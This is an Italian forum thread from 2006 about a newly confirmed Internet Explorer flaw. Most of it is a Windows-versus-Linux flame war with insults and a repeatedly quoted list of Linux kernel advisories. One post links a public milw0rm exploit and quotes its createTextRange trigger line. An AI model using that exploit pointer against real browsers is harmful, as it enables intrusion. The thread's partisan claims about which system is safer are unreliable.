- Scritto da: Anonimo> cdo> > rosicate, rosicate...finchè potrete farlo; perchè> è in Vista una rivoluzione dell'intero comparto> IT, che insabbierà tutti i sistemi operativi> linari del pianeta!> > (win)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)Ti Vogliamo a Zelig in TV!!!!pikappaIE7beta2 di marzo 7.0.5335.5 NON affetto
IE7beta2 di marzo 7.0.5335.5 NON affettoAnonimoRe: IE7beta2 di marzo 7.0.5335.5 NON aff
- Scritto da: Anonimo> IE7beta2 di marzo 7.0.5335.5 NON affettoe secondo te perchè?http://punto-informatico.it/forum/pols.asp?mid=1392025&tid=1392025&p=1&r=PIAnonimoRe: IE7beta2 di marzo 7.0.5335.5 NON aff
Eh si', lo usano in tanti! :-)- Scritto da: Anonimo> IE7beta2 di marzo 7.0.5335.5 NON affettoAnonimoRe: IE7beta2 di marzo 7.0.5335.5 NON aff
- Scritto da: Anonimo> Eh si', lo usano in tanti! :-)è una preview pubblica; fra l'altro molto stabile e migliore di IE6 SP2.Se lo vuoi scaricare:http://www.microsoft.com/windows/ie/default.mspxAnonimoRe: IE7beta2 di marzo 7.0.5335.5 NON aff
- Scritto da: Anonimo> > - Scritto da: Anonimo> > Eh si', lo usano in tanti! :-)> > è una preview pubblica; fra l'altro molto stabile> e migliore di IE6 SP2.> Se lo vuoi scaricare:> http://www.microsoft.com/windows/ie/default.mspxNo grazie, uso firefox.AnonimoRe: IE7beta2 di marzo 7.0.5335.5 NON aff
per me se la possono tenere uso Firefox e Linux! ... e' da 1 anno circa che non vedo piu' Windows se non per fornire assistenza al solito utonto (tra questi addirittura esperti informatici come voi ... che ancora non hanno imparato bene a fare 3 clic)AnonimoRe: IE7beta2 di marzo 7.0.5335.5 NON aff
- Scritto da: Anonimo> Eh si', lo usano in tanti! :-)> Un pò come Linux :pAnonimo9 --
AnonimoRe: peccato che la versione 7
- Scritto da: lalla63> non potrà essere utilizzata su w2kè un colabrodo. Molto meglio XP SP2.>, ancora molto> diffuso in utenze professionali.w2k = utenze professionali?wxp = utenze home?Sbagli!AnonimoRe: peccato che la versione 7
- Scritto da: mda> Visto che il buco interessa anche IE7 ! (leggi> post precedente)IE7 preview di Marzo NON è affetto. Prima di parlare, informatevi!AnonimoTitolo di PI è forviante!
Il titolo di PI "confermata nuova falla in IE" è forviante, perchè sembrerebbe riferirsi alla falla DoS di ieri in cui Microsoft diceva che stava indagando. Ma sono 2 falle diverse!AnonimoRe: Titolo di PI è forviante!
Sarebbe stato fuorviante se avessero titolato "Confermata LA nuova falla di IE" ;-)- Scritto da: Anonimo> Il titolo di PI "confermata nuova falla in IE" è> forviante, perchè sembrerebbe riferirsi alla> falla DoS di ieri in cui Microsoft diceva che> stava indagando. Ma sono 2 falle diverse!AnonimoRe: Titolo di PI è forviante!
- Scritto da: Anonimo> Sarebbe stato fuorviante se avessero titolato> "Confermata LA nuova falla di IE" ;-)però ci hanno giocato...AnonimoValanghe di falle per Linux
Linux Kernel SDLA IOCTL Unauthorized Local Firmware Access Vulnerability2006-03-24http://www.securityfocus.com/bid/16304 Linux Kernel DM-Crypt Local Information Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16301 Linux Kernel Sysctl_String Local Buffer Overflow Vulnerability2006-03-24http://www.securityfocus.com/bid/16141 Linux Kernel ProcFS Kernel Memory Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16284 Linux Kernel IP6_Input_Finish Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16043 Linux Kernel Time_Out_Leases PrintK Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15627 Linux Kernel ICMP_Push_Reply Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16044 Linux Kernel handle_stop_signal Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16856 Linux Kernel IPv6 FlowLable Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15729 Linux Kernel PTraced Child Auto-Reap Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15625 Linux Kernel PTrace CLONE_THREAD Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15642 Linux Kernel SET_MEMPOLICY Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16135 Linux Kernel mq_open System Call Unspecified Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16283 Linux Kernel Console Keymap Local Command Injection Vulnerability2006-03-24http://www.securityfocus.com/bid/15122 Linux Kernel Multiple Memory Leak Local Denial Of Service Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15076 Linux Orinoco Driver Remote Information Disclosure Vulnerability2006-03-23http://www.securityfocus.com/bid/15085 Linux Kernel USB Subsystem Local Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14955 Linux Kernel Multiple Security Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15049 Linux Kernel 64-Bit SMP Routing_ioctl() Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14902 Linux Kernel IPV6 Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15156 Linux Kernel SCSI ProcFS Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14790 Linux Kernel Sysctl Unregistration Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15365 Linux Kernel IPSec Policies Authorization Bypass Vulnerability2006-03-23http://www.securityfocus.com/bid/14609 Linux Kernel ISO File System Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14614 Linux Kernel Sendmsg() Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14785 Linux Kernel Multiple Vulnerabilities2006-03-23http://www.securityfocus.com/bid/12598 Linux Kernel Coda_Pioctl Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14967 Linux Kernel USB io_edgeport Driver Local Integer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/12102 Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities2006-03-23http://www.securityfocus.com/bid/17203 Linux Kernel die_if_kernel Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/16993 ecc. ecc.:DAnonimoRe: Valanghe di falle per Linux
- Scritto da: Anonimo> Linux Kernel SDLA IOCTL Unauthorized Local> Firmware Access Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16304 > > Linux Kernel DM-Crypt Local Information> Disclosure Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16301 > > Linux Kernel Sysctl_String Local Buffer Overflow> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16141 > > Linux Kernel ProcFS Kernel Memory Disclosure> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16284 > > Linux Kernel IP6_Input_Finish Remote Denial Of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16043 > > Linux Kernel Time_Out_Leases PrintK Local Denial> of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15627 > > Linux Kernel ICMP_Push_Reply Remote Denial Of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16044 > > Linux Kernel handle_stop_signal Denial of Service> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16856 > > Linux Kernel IPv6 FlowLable Denial Of Service> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15729 > > Linux Kernel PTraced Child Auto-Reap Local Denial> of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15625 > > Linux Kernel PTrace CLONE_THREAD Local Denial of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15642 > > Linux Kernel SET_MEMPOLICY Local Denial of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16135 > > Linux Kernel mq_open System Call Unspecified> Denial of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16283 > > Linux Kernel Console Keymap Local Command> Injection Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15122 > > Linux Kernel Multiple Memory Leak Local Denial Of> Service Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/15076 > > Linux Orinoco Driver Remote Information> Disclosure Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15085 > > Linux Kernel USB Subsystem Local Denial Of> Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14955 > > Linux Kernel Multiple Security Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/15049 > > Linux Kernel 64-Bit SMP Routing_ioctl() Local> Denial of Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14902 > > Linux Kernel IPV6 Local Denial of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15156 > > Linux Kernel SCSI ProcFS Denial Of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14790 > > Linux Kernel Sysctl Unregistration Local Denial> of Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15365 > > Linux Kernel IPSec Policies Authorization Bypass> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14609 > > Linux Kernel ISO File System Denial Of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14614 > > Linux Kernel Sendmsg() Local Buffer Overflow> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14785 > > Linux Kernel Multiple Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/12598 > > Linux Kernel Coda_Pioctl Local Buffer Overflow> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14967 > > Linux Kernel USB io_edgeport Driver Local Integer> Overflow Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/12102 > > Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory> Disclosure Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/17203 > > Linux Kernel die_if_kernel Local Denial of> Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/16993 > > ecc. ecc.> > :D>> /rosikAnonimoRe: Valanghe di falle per Linux
- Scritto da: Anonimo> Linux Kernel SDLA IOCTL Unauthorized Local[... una camionata di falle]Quoto tutto e godo come un maiale!TrollfighterRe: Valanghe di falle per Linux
la valanga di falle per Windows non corrette?e quelle non annunciate?Suvvia non siate ironici.AnonimoRe: Valanghe di falle per Linux
AHAHHAHAH! E I LINARI DOVE SONO? NEGANO?RIDICOLI, TORNATEVENE NELLA CAMERETTA OKKUPATA ADIACENTE AL CENTRO SOCIALE.- Scritto da: Anonimo> Linux Kernel SDLA IOCTL Unauthorized Local> Firmware Access Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16304 > > Linux Kernel DM-Crypt Local Information> Disclosure Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16301 > > Linux Kernel Sysctl_String Local Buffer Overflow> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16141 > > Linux Kernel ProcFS Kernel Memory Disclosure> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16284 > > Linux Kernel IP6_Input_Finish Remote Denial Of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16043 > > Linux Kernel Time_Out_Leases PrintK Local Denial> of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15627 > > Linux Kernel ICMP_Push_Reply Remote Denial Of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16044 > > Linux Kernel handle_stop_signal Denial of Service> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16856 > > Linux Kernel IPv6 FlowLable Denial Of Service> Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15729 > > Linux Kernel PTraced Child Auto-Reap Local Denial> of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15625 > > Linux Kernel PTrace CLONE_THREAD Local Denial of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15642 > > Linux Kernel SET_MEMPOLICY Local Denial of> Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16135 > > Linux Kernel mq_open System Call Unspecified> Denial of Service Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/16283 > > Linux Kernel Console Keymap Local Command> Injection Vulnerability> 2006-03-24> http://www.securityfocus.com/bid/15122 > > Linux Kernel Multiple Memory Leak Local Denial Of> Service Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/15076 > > Linux Orinoco Driver Remote Information> Disclosure Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15085 > > Linux Kernel USB Subsystem Local Denial Of> Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14955 > > Linux Kernel Multiple Security Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/15049 > > Linux Kernel 64-Bit SMP Routing_ioctl() Local> Denial of Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14902 > > Linux Kernel IPV6 Local Denial of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15156 > > Linux Kernel SCSI ProcFS Denial Of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14790 > > Linux Kernel Sysctl Unregistration Local Denial> of Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/15365 > > Linux Kernel IPSec Policies Authorization Bypass> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14609 > > Linux Kernel ISO File System Denial Of Service> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14614 > > Linux Kernel Sendmsg() Local Buffer Overflow> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14785 > > Linux Kernel Multiple Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/12598 > > Linux Kernel Coda_Pioctl Local Buffer Overflow> Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/14967 > > Linux Kernel USB io_edgeport Driver Local Integer> Overflow Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/12102 > > Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory> Disclosure Vulnerabilities> 2006-03-23> http://www.securityfocus.com/bid/17203 > > Linux Kernel die_if_kernel Local Denial of> Service Vulnerability> 2006-03-23> http://www.securityfocus.com/bid/16993 > > ecc. ecc.> > :DAnonimo9 --
Anonimo5 --
TrollfighterRe: Valanghe di falle per Linux
- Scritto da: Anonimo> AHAHHAHAH! E I LINARI DOVE SONO? NEGANO?> RIDICOLI, TORNATEVENE NELLA CAMERETTA OKKUPATA> ADIACENTE AL CENTRO SOCIALE.> > Eccone qua' uno!Sai capire il senso di tutte queste vulnerabilita'? Prova a sfruttarne una se ci riesci, dovresti prima di tutto venire da questa parte del monitor... (-;Il codice sorgente del kernel e' pubblico, tutte le vulnerabilita' trovate diventano pubbliche. Quello che vieni a sapere su windos e' quello che microsoft viene costretta a rivelare, e non ho idea quanti bug vengano chiusi come WONT FIX. Tu puoi dire zero, microsoft corregge tutte le falle trovate, io posso dire milioni, microsoft corregge solo le falle che gli fa' comodo e abbiamo ragione entrambi, chi e' che puo' dirlo se non si puo' vederne il codice?AnonimoRe: Valanghe di falle per Linux
E' che tu non hai fede. I winari accettano per fede che NON esistono falle in Windows, e sono i comunisti linari che sostengono che Windows sia bacato.E quando esce la finestrella sull'invio di informazioni a Redmond, loro cliccano "Invia" perché sono convinti che stanno dando una mano fondamentale al miglioramento di ics-pi.E quando RARAMENTE si blocca il computer, danno la colpa all'hardware, ai programmi, alle condizioni meteo... oppure sostengono che "it's not a bug, it's a feature". I più, d'altronde, neanche si accorgono dei blocchi, per quanto ci sono abituati.E a chi lo chiedesse: no, non rosico, ho la mia bella macchina Linux ma soprattutto ho la guardia alta contro tutto: è quest'ultima la prima difesa.AnonimoRe: Valanghe di falle per Linux
Le falle ci saranno sempre e comunque, in ogni OS"closed source" od "open source" che sia.L'importante è "tapparle" il più in fretta possibile.In ultima analisi, se non le "tappa" nessuno èl'amministratore di un sistema che dovrebbeesaminare il codice sorgente e provvedereda sé. Questa è ovviamente una cosa chenon possono fare tutti. Di sicuro ciò non èfattibile su un OS "closed source", comunque.AnonimoRe: Valanghe di falle per Linux
- Scritto da: Anonimo> In ultima analisi, se non le "tappa" nessuno è> l'amministratore di un sistema che dovrebbe> esaminare il codice sorgente e provvedere> da sé. Questa è ovviamente una cosa che> non possono fare tutti. Di sicuro ciò non è> fattibile su un OS "closed source", comunque.quanti amministratore di sistema sono in grado di tappare una falla da se? Le falle le tappano i ricercatori di sicurezza, non di certo gli amministratori di sistemaAnonimoRe: Valanghe di falle per Linux
purtroppo ti capisco ... hai una mentalita' closed.Linux e' diverso da Vista... dove c'e' una fase di test etc prima di rilasciare il prodotto sul mercato.I vari aggiornamenti per Linux sono subito disponibili, e ci sono versioni del kernel in fase di test subito disponibili a tutti ... in modo che si possano correggere bug ed arrivare ad una versione stabile. L'elenco chilometrico che hai fatto per arrampicarti sul tuo specchio e' inutile.Ripeto, ti capisco. Hai una mentalita' closed.AnonimoRe: Valanghe di falle per Linux
- Scritto da: Anonimo> Linux e' diverso da Vista... dove c'e' una fase> di test etc prima di rilasciare il prodotto sul> mercato.> I vari aggiornamenti per Linux sono subito> disponibili, e ci sono versioni del kernel in> fase di test subito disponibili a tutti ... La stessa cosa la fa Microsoft con le versioni rilasciate ai betatesterAnonimoRe: Valanghe di falle per Linux
A differenza dei Beta Tester (utonti) su Linux la gente e' piu' competente e non si limita a fare 4 clic. Qui si ha accesso ai sorgenti, e' possibile stratestare tutto ... le vulnerabilita' sono normali.Cio' che divverenzia Windows da Linux o altri Open Source e' la rapidita' con la quale puo' essere corretta una vulnerabilita' ... imparagonabile con Windows.Non e' un caso che virus, malware, spyware, falle di vario tipo con diffusione di virus (es. blaster) etc sia aspetto del solo Microsoft.E non mi venite a dire che e' cosi' perche' Linux e' poco utilizzato perche' non e' cosi per 2 motivi fondamentali:1) da quello che vedo nel mio piccolo Linux e' conosciutissimo, e molta gente sta iniziando ad utilizzarlo per stabilita' e sicurezza ineguagliabili (gli stessi utonti se ne rendono conto ... mi meraviglio di voi superesperti winari)2) Virus per Linux ci sono ... ma e' inutile farli ... non farebbero i danni che fanno su Windows o su milioni di PC come spesso succede con conseguente spesa sia per le persone che per lee aziende.Mi spiace che non siate riusciti ad installare Linux anche se l'operazione e' molto semplice (forse perche' atrofizzati da Windows) e a non usarlo in tutte le sue potenzialita' (occorre avere un QI al di sopra del minimo assoluto ... e mi rendo conto che non e' da tutti), ma questo non giustifica le cretinate che andate dicendo su Linux che nemmeno conoscete.saluti.AnonimoRe: Valanghe di falle per Linux
- Scritto da: AnonimoChissa' se conosci la differenza tra una falla sfruttabile da remoto e non patchata con quelle che hai postato ...GiamboRe: Valanghe di falle per Linux
- Scritto da: Giambo> Chissa' se conosci la differenza tra una falla> sfruttabile da remoto e non patchata con quelle> che hai postato ...e i linari con le bende sugli occhi...AnonimoRe: Valanghe di falle per Linux
- Scritto da: Anonimo> > Chissa' se conosci la differenza tra una falla> > sfruttabile da remoto e non patchata con quelle> > che hai postato ...> > e i linari con le bende sugli occhi...Ecco, ti sei risposto: Non conosci la differenza :D !Vabbeh, fa' nulla, non e' grave. Studia, studia e poi ripassa.Giambore:valangeh::browser vs s.o. ???
CIoè,ora pi ha toccato il fondo.stanno confrontando le falle di un kernel(attualmente è il kernel con + funzionalità,nonchè col maggior riconoscimento hardware)con quelle di UN BROWSER :| :| :| :| :| :| :| ma dico io,scherziamo vero?ragazzi,per favore:non parlate di cose di cui ignorate il significato.==================================Modificato dall'autore il 24/03/2006 17.29.59frizzoIdentita` della falla...
A me sembra proprio la stessa riportata da milw0rm.Riassunto:PI riporta un link a http://secunia.com/advisories/18680 che a sua volta riporta "The vulnerability is caused due to an error in the processing of the "createTextRange() method call" , e che inoltre "Exploit code is out!" .E infatti l'exploit e` pubblicato, appunto, da milw0rm:http://www.milw0rm.com/exploits/1606e in cui l'ultima riga dello script menziona:var r = document.getElementById('blah'). createTextRange() ;proprio il metodo in questione.Ripeto, a me sembra lo stesso, a meno che non ci siano DUE falle leggermente diverse che entrambe chiamano in causa la chiamata a createTextRange.alex.tgRe: Identita` della falla...
- Scritto da: alex.tg> A me sembra proprio la stessa riportata da> milw0rm.> chiamano in causa la chiamata a createTextRange.la falla riportata da milw0rm è quella di oggi del createTextRange, ma quella che PI ha pubblicato ieri invece era un altra e si trattata di un DoS causato da una incapacità di gestire molti eventi tipo OnClick che non hanno nulla a che vedere con il createTextRange.AnonimoMI CONSENTA
Ma guarda un pò i troll da combattimento cosa avranno da replicare al cimitero dei bug esistenti riportato nel post: http://punto-informatico.it/forum/pol.asp?mid=1392627&tid=1392627&p=1&r=PImi consenta signor pinguazzo con la camicia a quadri di farle tre belle pernacchie in pieno stile nerd e complimentarmi per la lista nera, provvisoria, e poi venir a rompere i maroni all'Utente Win per un bug ogni tanto.Mi consenta signor piumato di ringraziarla di NON essere utente WIN. Ci guadagnamo tutti.linux, what's next bug today?AnonimoRe: MI CONSENTA
- Scritto da: Anonimo> linux, what's next bug today?Grandioso!!! Dovrebbero proiettare questo slogan quando Torwald fa i suoi comizi nei centri sociali.Mwahahahahah!TrollfighterRe: MI CONSENTA
- Scritto da: Trollfighter> > - Scritto da: Anonimo> > > linux, what's next bug today?> come dicono a livorno:CI VOLE LA GHIGNA COME IL CULO(ci vuole la faccia come il sedere)